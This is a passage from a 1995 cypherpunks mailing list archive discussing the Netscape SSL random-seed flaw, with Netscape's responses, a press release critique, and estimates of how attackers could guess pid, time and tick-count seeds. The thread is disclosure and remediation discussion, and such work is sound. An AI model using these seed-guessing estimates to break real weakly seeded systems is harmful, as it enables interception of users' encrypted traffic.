about, but some new ones too. Thanks to those who have responded already, and also to those who will respond. I'm sorry, but I can't guarantee an individual response... --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From sameer at c2.org Wed Sep 20 01:17:15 1995 From: sameer at c2.org (sameer) Date: Wed, 20 Sep 95 01:17:15 PDT Subject: netscape's response In-Reply-To: <43oa83$nhm@tera.mcom.com> Message-ID: <199509200812.BAA17876@infinity.c2.org> > > If the attacker does not have access to the machine to determine the > pid and ppid, then the attack will take longer. If the Navigator > is running on an SGI machine with a high resolution cycle counter then > it is used as the first of the two 32bit seeds. The release mentioned "computation time". In my book that doesn't include the setup time involved in figureing out how to snag the packets, sending the sendmail spoofs in order to approximate the pid and ppid, etc. > I believe that it would take much longer than 1 minute to mount an > attack against a mac, pc, or unix machine that the attacker was not "time to mount an attack" is not "computation time". I'm really not debating with -you- though here, just describing how the release was inaccurate. I don't deny any of your statements > logged on to. I don't know exactly how the few hour number was > calculated, since it was done by marketing with input from someone else > in the group. Another interesting data point is that the unix version, > which was most vulnerable, accounts for less than 10% of our user > base, according to the yahoo random link stats. Is UNIX really the most vulnerable? How many bits did the tickcount account for? Seems to me that guessing just time & tick would be easier than guessing time, pid and ppid if you are not logged into the machine in question. . . > > Of course none of this reduces the magnitude of the screw up/bug/design > flaw/whatever. I really can't say which of these it was since I wasn't > around at the time that this code was being written. I must admit that > the RNG seed code was not an area that I thought to examine when I took > over our security library. I don't know what your background is, so don't take this as a personal attack please, but someone who is trained in computer security and cryptography implementation should *know* to check these things. Hell, even I would check those things, and I'm not a cryptographer by any means. > > This was a bad mistake on our part, and we are working hard to fix it. > We have been trying to identify sources of random bits on PCs, Macs, and > all of the many unix platforms we support. We are looking at stuff that > is system dependent, user dependent, hardware dependent, random external > sources such as the network and the user. If anyone has specific > suggestions I would love to hear them so that we can do a better job. > Again, Kudos to Netscape for the quick response. > > A group which offered to review the first version, but > > Netscape refused. > > Do you mean that cypherpunks offered to review the netscape code > if only we made all the source available on the net? I think that it > is unrealistic to expect us to release all of our source code to the > net. I was referring to Jim Bidzos's comment, posted to cypherpunks. The release I will be sending out is written much more cleanly than what I initially posted to cypherpunks. > > We will be having at least some of our code reviewed by a > wider audience, but I don't yet know which code, or how wide a review > group. If anyone has specific suggestions for pieces of code that > you would like to see widely reviewed (such as RNG and seed generation) > let me know. Great! > > I realize that some cypherpunks think that we should make all of > our code publicly available. In an ideal world that would be great, > but we live in a world with politicians, crooks, lawyers, stockholders, > etc... Don't expect to see us posting our entire security > library source code to cypherpunks. Ah but who's to stop an anonymous posting. nudgenudge. ;) (This is a -joke-, for those excessively humor impaired) > > From their release it looks like they aren't finding a better > > source of entropy, but just using *more* sources of entropy. Doesn't > > mean that the entropy is good. > > I would love to hear your suggestions for good sources of entropy > on any systems that our products run on. When I wrote that sentence I misread the release -- my apologies-- my initial reading gave me the impression that the only thing that was being done was increasing the key size to 300 with no additional work towards finding sources of randomness, which you have said you were working on. -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From sameer at c2.org Wed Sep 20 01:23:47 1995 From: sameer at c2.org (sameer) Date: Wed, 20 Sep 95 01:23:47 PDT Subject: COMMUNITY CONNEXION CORRECTS INACCURACIES IN NETSCAPE PRESS RELEASE Message-ID: <199509200818.BAA18511@infinity.c2.org> Sept. 20, 1995 For Immediate Release Contact: Sameer Parekh 510-601-9777 COMMUNITY CONNEXION CORRECTS INACCURACIES IN NETSCAPE PRESS RELEASE In response to Ian Goldberg and David Wagner's recent cryptanalysis and defeat of Netscape Navigator's security, Netscape Communications Corporation has recently issued a press release describing the work Ian and David had done, announced a fix, and offered comments on what they felt were the implications on the security of their software. Community ConneXion congratulated Netscape Communications Corporation today for their quick response to this security problem. The fact that they responded to the problem within two days of its publication reflects well upon their responsiveness to the internet community, said Sameer Parekh, Community ConneXion founder. Sameer noted, however, that their release contained a number of inaccuracies. He wrote a document detailing the inaccuracies that he found, available via the World-Wide-Web at http://www.c2.org/hacknetscape/critique.phtml. He noted that they overestimated the time necessary to exploit the bug by roughly two orders of magnitude. The description of the bug was also flawed, said Sameer. Finally, he described how the solution Netscape was presenting to the problem was viewed by many members of the internet security community as only a partial fix. "Millions of customers and their sensitive information are at stake. Had Ian and Dave been criminals rather than honest students, they might have taken this opportunity to steal credit card numbers, snoop on people's financial transactions, and possibly more." "Are we going to take the chance that the next person who finds a Netscape bug may be someone who would rather steal lots of money than win some T-shirt?" asked Sameer, referring to the T-shirt promotion his company has developed, offering free T-shirts to people who have found holes in Netscape security software. Community ConneXion is the premier internet privacy ISP. They offer anonymous accounts, remailers, and psuedonym servers, in addition to the standard ISP fare of webspace and dialup IP access. Information is available from http://www.c2.org or mailing info at c2.org. Netscape and Netscape Navigator are trademarks of Netscape Communications Corporation. From sameer at c2.org Wed Sep 20 01:31:04 1995 From: sameer at c2.org (sameer) Date: Wed, 20 Sep 95 01:31:04 PDT Subject: netscape's response In-Reply-To: <199509200812.BAA17876@infinity.c2.org> Message-ID: <199509200825.BAA18996@infinity.c2.org> > but someone who is trained in computer > security and cryptography implementation should *know* to check these > things. Upon consideration, I am going to retract this statement-- I suppose you can't check -everything-. (I still blame Netscape for shoddy crypto in the first place, just not Jeff in particular) -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From jsw at netscape.com Wed Sep 20 01:42:47 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Wed, 20 Sep 95 01:42:47 PDT Subject: netscape's response In-Reply-To: <199509200729.AAA24565@Csli.Stanford.EDU> Message-ID: <9509200139.ZM206@tofuhut> On Sep 20, 12:29am, Christian Wettergren wrote: > Subject: Re: netscape's response > One wild idea that I just got was to have servers and clients exchange > random numbers (not seeds of course), in a kind of chaining way. Since > most viewers connect to a number of servers, and all servers are > connected to by many clients, they would mix "randomness sources" with > each other, making it impossible to observe the local environment > only. And the random values would of course be encrypted under the > session key, making it impossible to "watch the wire". Wow, this is a great idea!! SSL already sends various encrypted random values back and forth between client and server, so this may not be too hard to implement without changing the protocol. I'll keep it in the back of my mind for when I have some time... --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From carolann at censored.org Wed Sep 20 01:55:20 1995 From: carolann at censored.org (Censored Girls Anonymous) Date: Wed, 20 Sep 95 01:55:20 PDT Subject: C'Punks meet the T*'s, T*'s meet the C'Punks! Message-ID: <199509200855.BAA25899@usr4.primenet.com> -----BEGIN PGP SIGNED MESSAGE----- Washington, DC is not a cyberpunk town. TheXGrrrl (Jessica Xavier) You are absolutely right. It's not a cyberpunk town. It's a cypherpunk town, and I ultimately deal in munitions. PGP, the program that signed this message, is a munition. It's illegal to export the stuff. So good, the military uses it. I will teach everyone how to use it, and make what's called: A WEB OF TRUST! Having a ninety person web of trust, will get you farther than millions and millions of dollars. This is affectionately known as "a reputation market". I started a small transgendered reputation market last winter. It has yet to be broken. A TRANSGENDER WEB OF TRUST, can and will do more than HRCF ever dreamed of. And in no time at all! Once you make and start to sign other persons keys, THEN YOU CAN RELY on what is coming to your computer, and THEY CAN RELY on what is coming from you. This is what the Human Rights Campaign Fund has relied on: They have relied on us being in a web of omission! They have relied on us worrying about being in error! The result is that we are out of The Employment Nondiscimination Act. THE CYPHERPUNK WEB OF TRUST is absolutely kewl! We went from cracking a key, to cracking a bigger key, to CRACKING NETSCAPE inside of one month. How we deal with ENDA will be NO DIFFERENT, once a WEB OF TRUST IS IN PLACE! Each signed PGP message extends the WEB OF TRUST. Each new key means that SEXUAL IDENTITY is as important as SEXUAL ORIENTATION. It effectively stops the so-in-so told so-in-so told so-in-so stuff dead cold. And as a result I can now issue two HEADLINES: CAROL ANNE BEGINS TO EXPAND "TRANSGENDER WEB OF TRUST". CYPHERPUNKS WATCH CAROL ANNE FLEX PGP'S MUSCLE FOR TRANSGENDER'S. For when we are in DC, I will help you all make and sign keys. And when we're done, somebody will go to Phil Z. to sign his/her key. You can then resign each key, and send it to the keyservers in total confidence. Then you too, become a munitions dealer. You will be amazed at who your new friends will become. What they will give you. THIS VERY COMPUTER THAT I TYPE ON, IS A LIVING PROOF THAT THIS WORKS. Go do a whois on bugtown.com, this will show you where my new box came from. I started the CYPHERPUNK list with an 8088 at 2400 baud. I'm now at 486/66 at 14.4. And soon they'll have a secure server for me to use. We have Joe & Jill Sixpack, on the cypherpunk list. Joe and Jill are typical end users of computers. I am the embodiment of Jill Sixpack. The Cypherpunks know I can't write a word of code. But I can, and do, market the stuff really well. Cypherpunks, meet the Transgenders. Transgenders, meet the Cyperpunks. What you are about to witness is the implementation of legislation in Washington, using PGP as the information dissemination vehicle. Something unknown to exist at present. No Miss XGRRL, we don't need too much money. We now need only use the weapons at our disposal. They have been bought and paid for by the blood and sweat of the Cyperpunk Community. They are as good as having a nuclear missile pointed at THE HUMAN RIGHTS CAMPAIGN FUND. They are ours for the taking, using and learning. Just as being transgendered is a learning process, being a cypherpunk is also a learning process. Washington will be cracked! And having Pretty Good Privacy (tm) will be a whole lot better than lots of money and tons of gossip. Transgenders need facts, because our bodies are at stake. Cypherpunks need facts, because privacy is at stake. Many privacy rights are at stake in ENDA! I must end my rant now. Thanks for reading it. Love Always, Carol Anne Cypherpunk 9/20/95 3:50 AM CDT -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMF/VdorpjEWs1wBlAQGRZwQAxcplGTgzE6eSyPBYUk9icZUKwqgQhbZu XhNaRt+iyhvzKPkTBr3kNllPq0V1OxvoDpLp9imJ/MeKuvjq8FTUHO9ezu9que7N FlByM3JDK8A+GNx+/X6QanpI9Pk+vSAHkraY7ZVn+5CNPvoEhKdNGRxTxlNlHPRH uNRCh42/ZkY= =eyGa -----END PGP SIGNATURE----- -- Member Internet Society - Certified BETSI Programmer - Webmistress *********************************************************************** Carol Anne Braddock (cab8) carolann at censored.org 206.42.112.96 My Homepage The Cyberdoc *********************************************************************** ------------------ PGP.ZIP Part [017/713] ------------------- M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M MF=O0H+*%(-S%&>S%+FS& http://dcs.ex.ac.uk/~aba/export/ From unicorn at polaris.mindport.net Wed Sep 20 02:46:01 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Wed, 20 Sep 95 02:46:01 PDT Subject: response to netscape's press release In-Reply-To: <199509200336.UAA28871@infinity.c2.org> Message-ID: On Tue, 19 Sep 1995, sameer wrote: > Netscape secure software has been in use for almost a year on the > Internet by millions of customers and no thefts of actual customer > information protected by our security have been reported - this > posting on the Internet reported a potential vulnerability, not the > actual theft of customer information. > > Yes, Netscape is very lucky that Ian and David are students, and not > criminals. I sincerely hope that the next time someone finds a hole in > Netscape that it's someone who would rather win a free T-shirt than > steal lots of money. I hope exactly the reverse. It seems the only way the truth will get out and heads at Netscape or anywhere else will roll like they should. Consequences dictate incentives. No consequence, no incentive to avoid. > -- > sameer Voice: 510-601-9777 > Community ConneXion FAX: 510-601-9734 > An Internet Privacy Provider Dialin: 510-658-6376 > http://www.c2.org (or login as "guest") sameer at c2.org > --- "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From jsw at netscape.com Wed Sep 20 02:52:20 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Wed, 20 Sep 95 02:52:20 PDT Subject: netscape's response In-Reply-To: <199509200812.BAA17876@infinity.c2.org> Message-ID: <9509200248.ZM206@tofuhut> On Sep 20, 1:12am, sameer wrote: > > I believe that it would take much longer than 1 minute to mount an > > attack against a mac, pc, or unix machine that the attacker was not > > "time to mount an attack" is not "computation time". > > I'm really not debating with -you- though here, just > describing how the release was inaccurate. I don't deny any of your > statements The issue is that any statement that only mentions the 1 minute figure is only stating part of the story, just as a statement giving a figure of several hours is only mentioning a part of the story. All of the news articles I've seen (not an exhaustive sample) have only mentioned the 1 minute number, which only really effects a relatively small number of our customers. If you don't know the pid and ppid, or the tick count in the case of Mac/PC, you will have to add them to your search, which could make it take much longer than 1 minute to crack. If you assume that the unix machine has been up for a while and has a decent turnover of processes (not a valid assumption for determining strength) then you would have to search on average half of 16 bit pid space, and then add a few bits for the ppid(assuming that it is likely to be close to the pid). Even if you only got 8 extra bits from pid and ppid, that turns your one minute attack into a several hour attack. Anyway, I'm not trying to say that "several hours" is the only answer, just that it is just as good an answer as "one minute". As far as I know, no one has tried this attack without knowing the pids. > > > logged on to. I don't know exactly how the few hour number was > > calculated, since it was done by marketing with input from someone else > > in the group. Another interesting data point is that the unix version, > > which was most vulnerable, accounts for less than 10% of our user > > base, according to the yahoo random link stats. > > Is UNIX really the most vulnerable? How many bits did the > tickcount account for? Seems to me that guessing just time & tick > would be easier than guessing time, pid and ppid if you are not logged > into the machine in question. . . This is really dependent on how long window has been running. If you boot windows and immediately start an ssl connection, then the number will be pretty low, but if you don't make the first SSL connection until later, it should get better. I think an hour would get you around 16-bits, but this is just a guestimate on my part. If you leave your machine running windows for days you will get close to 32bits. > > Do you mean that cypherpunks offered to review the netscape code > > if only we made all the source available on the net? I think that it > > is unrealistic to expect us to release all of our source code to the > > net. > > I was referring to Jim Bidzos's comment, posted to > cypherpunks. > The release I will be sending out is written much more cleanly > than what I initially posted to cypherpunks. We had a conference call with RSA folks tuesday, and they will be in wednesday to take a look at our fix. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From unicorn at polaris.mindport.net Wed Sep 20 02:57:25 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Wed, 20 Sep 95 02:57:25 PDT Subject: Investing on Information We Get Here In-Reply-To: Message-ID: On Wed, 20 Sep 1995, Michael Shields wrote: > > (These computer lists are really great for investors! I heard about the > > Apple problems a few days before they hit the street, and was able to > > unload a bunch of shares at $45, a day before it dropped, now down to > > around $36. "He who hesitates to act on inside information is lost.") > > This isn't inside information in the illegal-to-trade-on-in-the-US sense, > is it? cypherpunks, while maybe not mainstream, is publicly available. You'd have to argue that reverse engineering was mis-appropriation within the meaning of the rules, and that the data was tipped to the tippee's with the intent of gain. In otherwords, you must have a fraud with respect to the rightful owner of the "misappropriated" information. That an important commerce system is insecure, be it publicly held or whatever, when publically posted, is hardly misappropriation, or if it is alleged so, I'll defend the accused (if they are in my jurisdictions of license). I might add that trading on information that has been released but just not propogated to the entire market yet is hardly illegal. If anyone wants a detailed analysis with cases on the subject, I will post to the list with enough interest. > -- > Shields. > --- "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From jsw at netscape.com Wed Sep 20 02:58:26 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Wed, 20 Sep 95 02:58:26 PDT Subject: netscape's response In-Reply-To: <199509200825.BAA18996@infinity.c2.org> Message-ID: <9509200254.ZM206@tofuhut> On Sep 20, 1:25am, sameer wrote: > Subject: Re: netscape's response > > but someone who is trained in computer > > security and cryptography implementation should *know* to check these > > things. > > Upon consideration, I am going to retract this statement-- I > suppose you can't check -everything-. (I still blame Netscape for > shoddy crypto in the first place, just not Jeff in particular) It turns out that Taher Elgamal and I started working here within a week of each other, about 6 months ago. Neither of us thought to take a serious look at the RNG seed code. I don't think that anyone would accuse Taher of being an amateur in this area. I for one just didn't think about it enough to realize that while we got the RNG code from RSA, they did not provide seed code. As for my background, I am not a trained cryptographer, but I do understand protocols, did some internet security work as a sysadmin while in school, and have had a casual interest in crypto stuff for several years. If you want the gory details see my web page... --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From unicorn at polaris.mindport.net Wed Sep 20 03:05:21 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Wed, 20 Sep 95 03:05:21 PDT Subject: C'Punks meet the T*'s, T*'s meet the C'Punks! In-Reply-To: <199509200855.BAA25899@usr4.primenet.com> Message-ID: On Wed, 20 Sep 1995, Censored Girls Anonymous wrote: > A TRANSGENDER WEB OF TRUST, can and will do more than HRCF ever > dreamed of. And in no time at all! Once you make and start to > sign other persons keys, THEN YOU CAN RELY on what is coming to > your computer, and THEY CAN RELY on what is coming from you. Two words. "Settlement Agreement." --- "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From jsw at netscape.com Wed Sep 20 03:06:04 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Wed, 20 Sep 95 03:06:04 PDT Subject: Please send me SSL problems... Message-ID: <199509201004.DAA23933@ammodump.mcom.com> I'd just like to let all cypherpunks know that I'm really interested in getting any feedback you might have about security problems with Netscape products. I'm particularly interested in bugs in the our implementation of SSL, and problems in the protocol that are not addressed in SSL 3.0. We have been collecting comments on SSL 3.0, and have started incorporating that feedback into our spec. Please don't assume that our lack of response means that we are ignoring your comments. Between Navigator 2.0 and things like the SSL challenge and the RNG fire drill, we just have not had the time to get a new rev of the spec out. Hopefully soon... I should also warn folks that Navigator 2.0 will not include SSL 3.0. We just don't have time to do it. It will become a high priority for us after 2.0 goes out, or maybe sooner depending on hiring. --Jeff Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From Holger.Reif at PrakInf.TU-Ilmenau.DE Wed Sep 20 03:35:43 1995 From: Holger.Reif at PrakInf.TU-Ilmenau.DE (Holger Reif ) Date: Wed, 20 Sep 95 03:35:43 PDT Subject: NYT on Netscape Crack Message-ID: <9509201034.AA10521@PrakInf.TU-Ilmenau.DE> Is it a good idea to use different (unrelated!) seeded PRNG's for the challenge data (which can be seen by sniffing) and the masterkey (which should never leave out of client's memory? read you later - Holger Reif http://remus.prakinf.tu-ilmenau.de/Reif/ From jsw at neon.netscape.com Wed Sep 20 03:38:58 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Wed, 20 Sep 95 03:38:58 PDT Subject: My Day In-Reply-To: <43o44t$hof@calum.csclub.uwaterloo.ca> Message-ID: <43oquc$70f@tera.mcom.com> In article <43o44t$hof at calum.csclub.uwaterloo.ca>, iagoldbe at calum.csclub.uwaterloo.ca (Ian Goldberg) writes: [ summary of Ian's day deleted ] Now imagine what my last 48 hours have been like. :-) > Holger.Reif at PrakInf.TU-Ilmenau.DE (Holger Reif ) was kind enough to > verify that the SunOS 4.1.3 version of Netscape generates its keys in > _exactly_ the same way as Solaris and HP-UX; he says he'll test other > architectures tomorrow. I suspect any big-endian machine with the > lrand48() function (which is used in key generation on Solaris/HP-UX; > it's disguised in unssl.c as the macro mklcpr()) will be the same. > Other Unix flavours should require only minor changes. Most of the unix machines do the same thing. On SGI machines that have the hardware cycle counter, its value is used in place of the srand48(usec), lrand48() sequence. BSDI the code used srandom and random. > I'm still interested in what Windoze clients do (other than lose). On windows and mac the first 32bit seed is seconds since 1970, and the second 32bit seed is the "tick count", which I'm told is the number of milliseconds since windows started. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From jsw at neon.netscape.com Wed Sep 20 03:50:32 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Wed, 20 Sep 95 03:50:32 PDT Subject: SSL implementation problem at Netscape In-Reply-To: <43kki8$os7@charm.magnus.acs.ohio-state.edu> Message-ID: <43ork2$70f@tera.mcom.com> In article <43o47v$fsd at cnn.Princeton.EDU>, dawagner at flagstaff.princeton.edu (David A. Wagner) writes: > In article from sci.crypt, > David Sternlight wrote: > > If the above is, in fact, accurate it appears to apply to previous > > versions of Netscape, not the 2.0 versions for which the public beta goes > > out next week. > > We haven't tried it on v2.0, as we only have a copy of v1.1 right now. > But the front-page New York Times article today said that the next version > also has the same flaw, and that it'll be fixed before release. First off, Sternlight is not an agent working for netscape. :-) The same fix that will be going out to patch old versions will be applied to 2.0 before we do a public beta. As with any code it will be refined as necessary before the final release of 2.0. [ stuff deleted ] > While we don't yet know exactly how long it would take to break Netscape's > PRNG in this threat model, I think it's clear that Netscape's current > implementation is insufficient and insecure. Agreed. See other messages of mine for a more detailed response. > We don't know about e.g. PC's yet -- this is another area we were still > working on. I will note that Netscape didn't try to claim that any version > was safe from this flaw, for what that's worth... Again, see my other messages on this and related topics for more details of what the code was doing on PC and Mac. > Hopefully this will be quickly fixed by Netscape, and then we can all stop > worrying about it! :-) Yup. Then I can get back to working only 16 hours a day. :-) --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From fair at clock.org Wed Sep 20 04:36:04 1995 From: fair at clock.org (Erik E. Fair (Time Keeper)) Date: Wed, 20 Sep 95 04:36:04 PDT Subject: Please send me SSL problems... Message-ID: > I'd just like to let all cypherpunks know that I'm really interested in >getting any feedback you might have about security problems with Netscape >products. I'm particularly interested in bugs in the our implementation >of SSL, and problems in the protocol that are not addressed in SSL 3.0. > > We have been collecting comments on SSL 3.0, and have started incorporating >that feedback into our spec. Please don't assume that our lack of response >means that we are ignoring your comments. Between Navigator 2.0 and >things like the SSL challenge and the RNG fire drill, we just have not had >the time to get a new rev of the spec out. Hopefully soon... Jeff, the SSL specification has a severe *architectural* problem - it assumes that Internet Protocols are APIs - interface standards, and that you can just slide a "layer" underneath without anyone noticing. Such is not the case - all the Internet Protocols are real protocol standards, in that they specify the syntax, order, and semantics of the actual bits on the wire. The IETF quite explicitly doesn't care about APIs - that's a host software issue, and it doesn't matter what the host software looks like (or even what the machine looks like), so long as it gets the bits on the wire right, according to the protocol spec. This is how the Internet can make very strong guarantees about interoperability. You can't fiddle with a communication protocol without getting agreement from everyone about the change, or extend it in a way that is compatible with the protocol you're modifying, on a per-protocol basis (e.g. adding a TELNET negotiation option to TELNET for encryption, an FTP command to FTP, etc). Otherwise, all you've done is made a private, non-interoperable change to an existing protocol that guarantees interoperability *failures* between systems that implement the existing specification, versus your own version of HTTP, or TELNET, or whatever. In short, the SSL specification, as written, proposes to change all Internet application protocols, globally - "slide in a layer." That's not how it's done, and it's not the right place to do it, even if it appears to work in an enclave of systems. About the SSL protocol, encryption algorithms, or the SQA that went into 'em, I think other people have expounded on those issues eloquently, and so I have nothing to add to that. Erik Fair From pfarrell at netcom.com Wed Sep 20 05:11:07 1995 From: pfarrell at netcom.com (Pat Farrell) Date: Wed, 20 Sep 95 05:11:07 PDT Subject: netscape's response Message-ID: <29391.pfarrell@netcom.com> "Jeff Weinstein" writes: > The issue is that any statement that only mentions the 1 minute figure > is only stating part of the story, just as a statement giving a figure > of several hours is only mentioning a part of the story. All of the > news articles I've seen (not an exhaustive sample) have only mentioned > the 1 minute number, which only really effects a relatively small > number of our customers. The Washington Post ran an article today in the Business section. Its byline said Elizabeth Corcoran. It refered to the four hour attack figure. It appeared to be mostly a rewrite of the Netscape press release -- nearly no quotes, no quoted local sources (TIS, Denning, etc.) I expect that many papers that are far from Silicon Valley will print it with a similar spin. Pat Pat Farrell Grad Student http://www.isse.gmu.edu/students/pfarrell Info. Systems & Software Engineering, George Mason University, Fairfax, VA PGP key available on homepage #include From perry at piermont.com Wed Sep 20 05:12:05 1995 From: perry at piermont.com (Perry E. Metzger) Date: Wed, 20 Sep 95 05:12:05 PDT Subject: NYT on Netscape Crack In-Reply-To: <155.9509191654@exe.dcs.exeter.ac.uk> Message-ID: <199509201211.IAA04771@frankenstein.piermont.com> aba at atlas.ex.ac.uk writes: > Andrew Loewenstern writes: > > Oh, can we now expect to see source to at least the security portions of > > Navigator and the Commerce server? > An excellent proposal. Not especially usefull. The bulk of the security problems won't obviously have anything to do with the "security" portion of the code. > Save Ian and David the effort of reverse engineering it again (which > it is obviously pointless, and more: mathematically impossible, to do), What do you mean, mathematically impossible? Thats silly. > Or if that doesn't sit well with copyright interests, how about > writing up an open spec about how the random number generator works? > Then we can critique it. That makes good sense, but I doubt they are that sensible. I also worry that they would try to do something like patenting obvious and long used techniques to "protect" themselves. Perry From sommerfeld at orchard.medford.ma.us Wed Sep 20 05:25:33 1995 From: sommerfeld at orchard.medford.ma.us (Bill Sommerfeld) Date: Wed, 20 Sep 95 05:25:33 PDT Subject: My Day In-Reply-To: <43oquc$70f@tera.mcom.com> Message-ID: <199509201218.MAA00433@orchard.medford.ma.us> A couple comments on using the time as a seed: Any system running NTP will let you know its clock to within a couple ms; some folks have gotten NTP accuracy down to the high hundred microseconds on real-time systems.. Any entropy you get from sampling the system clock will have to come from the low-order bits of the tv_usec, or equivalent, and you'll only get a few bits per sample. Getting real entropy from mouse movements under X may be tricky, because the X server goes out of its way to compress mouse movement reporting and to buffer events sent to the client ("X is an exercise in avoiding system calls"). You'll probably get less entropy than you might think. > the second 32bit seed is the "tick count", which I'm told is the number of > milliseconds since windows started. A 32-bit ms-resolution counter wraps roughly every 50 days. Very few Windoze PC's stay up that long :-). In a long-term active attack, the tick count can be estimated by periodically pinging the system under attack, noticing when it goes off the air and then back on again, and using that as a base value for the tick count search, so the tick count probably only adds a factor of somewhat less than 2**10 to the keyspace, not 2**32.. - Bill From m5 at dev.tivoli.com Wed Sep 20 05:49:32 1995 From: m5 at dev.tivoli.com (Mike McNally) Date: Wed, 20 Sep 95 05:49:32 PDT Subject: My Day In-Reply-To: <43oquc$70f@tera.mcom.com> Message-ID: <9509201248.AA09892@alpha> Bill Sommerfeld writes: > > the second 32bit seed is the "tick count", which I'm told is the number of > > milliseconds since windows started. > > A 32-bit ms-resolution counter wraps roughly every 50 days. Very few > Windoze PC's stay up that long :-). Also (and note that it's been a while since I've messed around with PC's, but since the "architecture" remains chained to an early-80's design I suspect they're still the same) the PC clock frequency is generally pretty low. PC UNIX implementations usually run it at about 100 Hz, I think. There aren't a lot of available timers on the PC. One of them used to be used as the DRAM refresh timer; I don't know whether they still do that. On the other hand, getting at a Windows PC over the network is a whole 'nuther enchilada, though if I want to keep my day job I need to get that figured out real soon now. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | Nobody's going to listen to you if you just | Mike McNally (m5 at tivoli.com) | | stand there and flap your arms like a fish. | Tivoli Systems, Austin TX | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From paul at poboy.b17c.ingr.com Wed Sep 20 05:50:38 1995 From: paul at poboy.b17c.ingr.com (Paul Robichaux) Date: Wed, 20 Sep 95 05:50:38 PDT Subject: netscape's response In-Reply-To: <43oa83$nhm@tera.mcom.com> Message-ID: <199509201245.AA11962@poboy.b17c.ingr.com> -----BEGIN PGP SIGNED MESSAGE----- Jeff-- First of all, let me commend you for your honesty and forthrightness in owning up to the problem. I applaud it both as a cypherpunk and as one of the guys at Intergraph who pushed really hard to get an OEM agreement with NCC. > If the Navigator is running on a Mac or PC, then the two seeds are > the current time and the "tick count", which is milliseconds since starting > windows for the PC version, and some time unit since booting on the Mac. The Mac tick unit is 1/60th of a second, and TickCount() returns the number of ticks since the system was booted. I think you could safely narrow the range down to between 0 and (3600 * 24 * 60 =) 5,184,000, or about 24 bits. That's better than on the Unix boxes, but not insurmountable. > This was a bad mistake on our part, and we are working hard to fix it. > We have been trying to identify sources of random bits on PCs, Macs, and > all of the many unix platforms we support. We are looking at stuff that > is system dependent, user dependent, hardware dependent, random external > sources such as the network and the user. If anyone has specific > suggestions I would love to hear them so that we can do a better job. I wouldn't consider the network to be suitably random. How many of your users are using Netscape over high-latency, low-speed 14.4 PPP/SLIP links? A lot, I'd bet. Not much good-quality randomness there. > > "Netscape has also begun to engage an external group of world-class > > security experts who will review our solution to this problem before > > it is sent to customers." > > > > A group which offered to review the first version, but > > Netscape refused. > Do you mean that cypherpunks offered to review the netscape code > if only we made all the source available on the net? I think that it > is unrealistic to expect us to release all of our source code to the > net. Unrealistic to expect, yes. Unreasonable to ask? Maybe not. > I realize that some cypherpunks think that we should make all of > our code publicly available. In an ideal world that would be great, > but we live in a world with politicians, crooks, lawyers, stockholders, > etc... Don't expect to see us posting our entire security > library source code to cypherpunks. That's probably not the most likely thing-- but why not allow people with some security & crypto background _from this list_ see the code, under NDA, for review? Jim Gillogly, Hal Finney, and several others have show a past talent for that sort of thing. Frankly, a signed message from, say, Hal saying "I've looked over the code and it looks pretty good" would carry a lot of water with me. In turn, I could communicate my warm fuzzy feeling to the dozen or so people that asked me about the security flaw yesterday, including our network ops guy. Cheers, - -Paul - -- Paul Robichaux, KD4JZG | "Things are much simpler and less stressful perobich at ingr.com | when you don't look to the law to fix things." Not speaking for Intergraph | - Tim May (tcmay at got.net) on cypherpunks Be a cryptography user. Ask me how. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMGANAafb4pLe9tolAQH+uQP7B7XvqVGnN4rDnSNth2PyVio5W5CpuA2U DgWwjV1DqPJCzA4BmM3/rRlYYG8Z2d50i5zb0XD6XbMi6bpkc9fGBZ6156p7sKa1 